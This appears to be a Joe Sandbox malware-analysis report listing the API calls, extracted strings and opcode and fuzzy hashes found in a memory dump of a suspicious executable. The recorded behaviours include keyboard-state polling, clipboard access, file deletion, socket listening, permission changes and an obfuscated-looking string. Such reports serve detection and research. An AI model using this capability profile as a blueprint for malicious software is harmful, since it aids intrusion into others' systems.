                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 835046349-2428617273
                                    • Opcode ID: 4ea1a00409216bed76f6dddbee8b5b9d7d1bfea22e867fd008bc9e18db43e9ec
                                    • Instruction ID: b967f3df9b234412455d949e384363722cd1ecb47331e2b76367452f5f7774b6
                                    • Opcode Fuzzy Hash: 4ea1a00409216bed76f6dddbee8b5b9d7d1bfea22e867fd008bc9e18db43e9ec
                                    • Instruction Fuzzy Hash: B5A11FB2408344ABC314EBA5C885DAFB7ECBFA8704F40492EF595D7191EB34D949CB62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00181B50
                                    • _wcscmp.LIBCMT ref: 00181B65
                                    • _wcscmp.LIBCMT ref: 00181B7C
                                    • GetFileAttributesW.KERNEL32(?), ref: 00181B8E
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00181BA8
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00181BC0
                                    • FindClose.KERNEL32(00000000), ref: 00181BCB
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00181BE7
                                    • _wcscmp.LIBCMT ref: 00181C0E
                                    • _wcscmp.LIBCMT ref: 00181C25
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00181C37
                                    • SetCurrentDirectoryW.KERNEL32(001E39FC), ref: 00181C55
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00181C5F
                                    • FindClose.KERNEL32(00000000), ref: 00181C6C
                                    • FindClose.KERNEL32(00000000), ref: 00181C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: c89b15884d45e81988948c16eae4de078249dad75c59e1b3aa0860b61816bcd0
                                    • Instruction ID: ff190b5466c8395e7d43e6a47effa07f960bac1ffbacac6ed551dfc94cde7e9f
                                    • Opcode Fuzzy Hash: c89b15884d45e81988948c16eae4de078249dad75c59e1b3aa0860b61816bcd0
                                    • Instruction Fuzzy Hash: CC31A332500219BFDF14BBA4EC49AEE77ACAF05320F1046A5F911E3090EB70DB868F64
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • DragQueryPoint.SHELL32(?,?), ref: 0019F37A
                                      • Part of subcall function 0019D7DE: ClientToScreen.USER32(?,?), ref: 0019D807
                                      • Part of subcall function 0019D7DE: GetWindowRect.USER32(?,?), ref: 0019D87D
                                      • Part of subcall function 0019D7DE: PtInRect.USER32(?,?,0019ED5A), ref: 0019D88D
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019F3E3
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0019F3EE
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0019F411
                                    • _wcscat.LIBCMT ref: 0019F441
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0019F458
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019F471
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0019F488
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0019F4AA
                                    • DragFinish.SHELL32(?), ref: 0019F4B1
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0019F59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: fd9bdd7e0ef595eb8e9114baffa15553c059ca69225fe81d7ad264c5db827f2c
                                    • Instruction ID: 9dadcbcd74a73204c530c5f6136d8b11623eba32d9e519ba0da8211cd743c8c9
                                    • Opcode Fuzzy Hash: fd9bdd7e0ef595eb8e9114baffa15553c059ca69225fe81d7ad264c5db827f2c
                                    • Instruction Fuzzy Hash: 46614971508300AFC715EF64DC85DAFBBF8EF99710F400A2EF595A21A1EB709A49CB52
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 001809DF
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001809EF
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001809FB
                                    • __wsplitpath.LIBCMT ref: 00180A59
                                    • _wcscat.LIBCMT ref: 00180A71
                                    • _wcscat.LIBCMT ref: 00180A83
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00180A98
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180AAC
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180ADE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180AFF
                                    • _wcscpy.LIBCMT ref: 00180B0B
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00180B4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: 2192f50a574610757c982f0683c42c86c1dcc53c93cdffb6e0d441c6b758d084
                                    • Instruction ID: 90a7c540a723e52a66f834432dea3718ef89a2dc3ce2780050471d8e3424b8d9
                                    • Opcode Fuzzy Hash: 2192f50a574610757c982f0683c42c86c1dcc53c93cdffb6e0d441c6b758d084
                                    • Instruction Fuzzy Hash: 09615A725042099FD710EF60C8859AEB3E8FF99314F04495DF99987251EB31EA49CF92
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0019EF3B
                                    • GetFocus.USER32 ref: 0019EF4B
                                    • GetDlgCtrlID.USER32(00000000), ref: 0019EF56
                                    • _memset.LIBCMT ref: 0019F081
                                    • GetMenuItemInfoW.USER32 ref: 0019F0AC
                                    • GetMenuItemCount.USER32(00000000), ref: 0019F0CC
                                    • GetMenuItemID.USER32(?,00000000), ref: 0019F0DF
                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0019F113
                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0019F15B
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0019F193
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0019F1C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 550ef5bbd267d005018efce133bc2f19cc97b2b3358109bd800ef6738803f103
                                    • Instruction ID: a6da45c1a21116f9bf9e6c8ce1dcbf454fa657b9621dbc768565c17973592528
                                    • Opcode Fuzzy Hash: 550ef5bbd267d005018efce133bc2f19cc97b2b3358109bd800ef6738803f103
                                    • Instruction Fuzzy Hash: 39816A70608301EFDB24CF15D884AABBBE9FB88314F14492EF999D7291D770D946CB92
                                    APIs
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                      • Part of subcall function 0016ABBB: GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                      • Part of subcall function 0016ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                      • Part of subcall function 0016ABBB: RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                      • Part of subcall function 0016AC56: GetProcessHeap.KERNEL32(00000008,0016A6B5,00000000,00000000,?,0016A6B5,?), ref: 0016AC62
                                      • Part of subcall function 0016AC56: RtlAllocateHeap.NTDLL(00000000,?,0016A6B5), ref: 0016AC69
                                      • Part of subcall function 0016AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0016A6B5,?), ref: 0016AC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0016A6D0
                                    • _memset.LIBCMT ref: 0016A6E5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0016A704
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A715
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0016A752
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0016A76E
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A78B
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0016A79A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016A7A1
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0016A7C2
                                    • CopySid.ADVAPI32(00000000), ref: 0016A7C9
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0016A7FA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0016A820
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0016A834
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 08a149d84020ec613105ef8babeba77f2d5d9ea591ee17a9891aabea574f6d41
                                    • Instruction ID: 809799fc910cc6ac31e3d7a9f881b6f8a2674042e045570f7a951ec4e7ed1f8a
                                    • Opcode Fuzzy Hash: 08a149d84020ec613105ef8babeba77f2d5d9ea591ee17a9891aabea574f6d41
                                    • Instruction Fuzzy Hash: 0F515B7190020AAFDF14DFA4DC85AEEBBB9FF04300F448129F911A7290EB359A55CF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$hixjsfhixjsfhixjsbhixjs8hixjs7hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs8hixjs5hixjs7hixjschixjsfhixj
                                    • API String ID: 0-950218936
                                    • Opcode ID: cee7df69a20551725e27a645b1e97e0cd2f4ce993cc92113d873383e3e058744
                                    • Instruction ID: 4b5c9a33afe32d66a17fd942cdb0321ed3d7dac1bdfa34bcfe31e252fa881c4d
                                    • Opcode Fuzzy Hash: cee7df69a20551725e27a645b1e97e0cd2f4ce993cc92113d873383e3e058744
                                    • Instruction Fuzzy Hash: 987281B1E04219DBDF28CF99D8807EEB7B5BF58310F15816AE815EB280DB709E45DB90
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • _wcscat.LIBCMT ref: 00176441
                                    • __wsplitpath.LIBCMT ref: 0017645F
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00176474
                                    • _wcscpy.LIBCMT ref: 001764A3
                                    • _wcscat.LIBCMT ref: 001764B8
                                    • _wcscat.LIBCMT ref: 001764CA
                                    • DeleteFileW.KERNEL32(?), ref: 001764DA
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001764EB
                                    • FindClose.KERNEL32(00000000), ref: 00176506
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                    • String ID: \*.*$p1Wu`KXu
                                    • API String ID: 2643075503-2866000061
                                    • Opcode ID: db77b081b5fcb31d8d4486a94ea8e084454bdb61b9459c3e7aa5d89fc05447b4
                                    • Instruction ID: b106e881b947fef5e79c5246790802efb2554a5af93a5adef3b52623075c4dce
                                    • Opcode Fuzzy Hash: db77b081b5fcb31d8d4486a94ea8e084454bdb61b9459c3e7aa5d89fc05447b4
                                    • Instruction Fuzzy Hash: A731B4B2408384AAC321DBE488859DB77ECAF6A310F044A6EF9E9C3141EB35D54D8767
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019328E
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0019332D
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001933C5
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00193604
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00193611
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00172B5F
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00172BE0
                                    • GetKeyState.USER32(000000A0), ref: 00172BFB
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00172C15
                                    • GetKeyState.USER32(000000A1), ref: 00172C2A
                                    • GetAsyncKeyState.USER32(00000011), ref: 00172C42
                                    • GetKeyState.USER32(00000011), ref: 00172C54
                                    • GetAsyncKeyState.USER32(00000012), ref: 00172C6C
                                    • GetKeyState.USER32(00000012), ref: 00172C7E
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00172C96
                                    • GetKeyState.USER32(0000005B), ref: 00172CA8
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    APIs
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    APIs
                                      • Part of subcall function 00169ABF: CLSIDFromProgID.COMBASE ref: 00169ADC
                                      • Part of subcall function 00169ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00169AF7
                                      • Part of subcall function 00169ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00169B05
                                      • Part of subcall function 00169ABF: CoTaskMemFree.COMBASE(00000000), ref: 00169B15
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0018C235
                                    • _memset.LIBCMT ref: 0018C242
                                    • _memset.LIBCMT ref: 0018C360
                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0018C38C
                                    • CoTaskMemFree.COMBASE(?), ref: 0018C397
                                    Strings
                                    • NULL Pointer assignment, xrefs: 0018C3E5
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001713DC
                                    Strings
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                    • API String ID: 1659193697-2318614619
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • GetSystemMetrics.USER32(0000000F), ref: 001A016D
                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 001A038D
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001A03AB
                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001A03D6
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001A03FF
                                    • ShowWindow.USER32(00000003,00000000), ref: 001A0421
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 001A0440
                                    Similarity
                                    • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                    • String ID:
                                    • API String ID: 2922825909-0
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • ReleaseCapture.USER32 ref: 0019ED48
                                    • SetWindowTextW.USER32(?,00000000), ref: 0019EDF0
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0019EE03
                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0019EEDC
                                    Strings
                                    Similarity
                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 973565025-2107944366
                                    APIs
                                      • Part of subcall function 0016B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                      • Part of subcall function 0016B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                      • Part of subcall function 0016B134: GetLastError.KERNEL32 ref: 0016B1BA
                                    • ExitWindowsEx.USER32(?,00000000), ref: 00177A0F
                                    Strings
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00188CA8
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188CB7
                                    • bind.WS2_32(00000000,?,00000010), ref: 00188CD3
                                    • listen.WS2_32(00000000,00000005), ref: 00188CE2
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188CFC
                                    • closesocket.WS2_32(00000000), ref: 00188D10
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00176554
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00176564
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00176583
                                    • __wsplitpath.LIBCMT ref: 001765A7
                                    • _wcscat.LIBCMT ref: 001765BA
                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001765F9
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                    • String ID:
                                    • API String ID: 1605983538-0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$hixjsfhixjsfhixjsbhixjs8hixjs7hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs8hixjs5hixjs7hixjschixjsfhixj
                                    • API String ID: 0-863283908
                                    APIs
                                      • Part of subcall function 0018A82C: inet_addr.WS2_32(00000000), ref: 0018A84E
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00189296
                                    • WSAGetLastError.WS2_32(00000000,00000000), ref: 001892B9
                                    Similarity
                                    • API ID: ErrorLastinet_addrsocket
                                    • String ID:
                                    • API String ID: 4170576061-0
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017EB8A
                                    • _wcscmp.LIBCMT ref: 0017EBBA
                                    • _wcscmp.LIBCMT ref: 0017EBCF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0017EBE0
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0017EC0E
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: d08ff7be80b6f3a2fe571852ad939357ec0432259d7334caeb250450efc3b482
                                    • Instruction ID: f1ef7f997cc37b1bf3f4285a53fa4d6a3c79c899bfc45256015bc603e8d6e744
                                    • Opcode Fuzzy Hash: d08ff7be80b6f3a2fe571852ad939357ec0432259d7334caeb250450efc3b482
                                    • Instruction Fuzzy Hash: E441CD356002029FCB08DF28C490EAAB7F4FF59324F10859DF95A8B3A1DB31E980CB91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 3140a8f95e35f13428c973b794897ee0ecfa9b11dc3d293d2afe67039b12ad14
                                    • Instruction ID: 4d1f79f2856f927afee2bdc04225c2081cb56c5f57794e26ba087b0a54466ad0
                                    • Opcode Fuzzy Hash: 3140a8f95e35f13428c973b794897ee0ecfa9b11dc3d293d2afe67039b12ad14
                                    • Instruction Fuzzy Hash: B111C1317002116FEB252F26EC84E6FBB9DEF56760B050539F84AD7241DF30E94286A4
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • GetCursorPos.USER32(?), ref: 0019F211
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001AE4C0,?,?,?,?,?), ref: 0019F226
                                    • GetCursorPos.USER32(?), ref: 0019F270
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,001AE4C0,?,?,?), ref: 0019F2A6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: cf56713d564d1b7899fcf72f3dfd39e1f1ec0140a029e07ef8d855de2c7e1c9b
                                    • Instruction ID: 0db42b7798c8ff5ae94b9cfb8517277fd51844a14e5daf0d931dd6ac6314bae1
                                    • Opcode Fuzzy Hash: cf56713d564d1b7899fcf72f3dfd39e1f1ec0140a029e07ef8d855de2c7e1c9b
                                    • Instruction Fuzzy Hash: FF218039500118FFCF298F95D858EFA7BB9EF09760F044169F9058B2A1D3309992DB50
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0014B5A5
                                    • GetClientRect.USER32(?,?), ref: 001AE69A
                                    • GetCursorPos.USER32(?), ref: 001AE6A4
                                    • ScreenToClient.USER32(?,?), ref: 001AE6AF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 4202036c67bd1358ec71d7c075eb3162c64f7924059d722b48a970ee5ffb0f9e
                                    • Instruction ID: 49a37f59dac37a5185ef5acf06570b3489f67be5dd80cf30dd5792b52fa9c045
                                    • Opcode Fuzzy Hash: 4202036c67bd1358ec71d7c075eb3162c64f7924059d722b48a970ee5ffb0f9e
                                    • Instruction Fuzzy Hash: 9511367590012ABBCB14EF94DD859EEB7B8EB1A304F000851F901E7150E334EA91CBA1
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0014B22F
                                      • Part of subcall function 0014B55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0014B5A5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
